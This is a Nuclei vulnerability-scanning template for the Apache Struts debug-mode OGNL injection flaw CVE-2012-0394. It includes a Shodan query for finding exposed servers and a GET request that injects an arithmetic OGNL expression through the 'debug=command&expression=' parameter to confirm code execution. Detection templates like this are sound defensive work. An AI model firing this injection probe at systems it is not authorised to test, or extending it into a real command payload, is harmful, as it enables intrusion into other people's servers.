nuclei-templates/cves/2012/CVE-2012-0394.yaml

46 lines
1.6 KiB
YAML

id: CVE-2012-0394
info:
name: Apache Struts <2.3.1.1 - Remote Code Execution
author: tess
severity: critical
description: |
Apache Struts before 2.3.1.1 is susceptible to remote code execution. When developer mode is used in the DebuggingInterceptor component, a remote attacker can execute arbitrary OGNL commands via unspecified vectors, which can allow for execution of malware, obtaining sensitive information, modifying data, and/or gaining full control over a compromised system without entering necessary credentials.. NOTE: the vendor characterizes this behavior as not "a security vulnerability itself."
reference:
- https://www.pwntester.com/blog/2014/01/21/struts-2-devmode-an-ognl-backdoor/
- https://www.exploit-db.com/exploits/31434
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
- http://www.exploit-db.com/exploits/18329
- https://nvd.nist.gov/vuln/detail/CVE-2012-0394
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2012-0394
cwe-id: CWE-77
metadata:
shodan-query: html:"Struts Problem Report"
verified: "true"
tags: ognl,injection,edb,cve,cve2012,apache,struts
variables:
first: "{{rand_int(1000, 9999)}}"
second: "{{rand_int(1000, 9999)}}"
result: "{{to_number(first)*to_number(second)}}"
requests:
- method: GET
path:
- '{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}'
matchers-condition: and
matchers:
- type: word
words:
- '{{result}}'
- type: status
status:
- 200
# Enhanced by md on 2023/01/30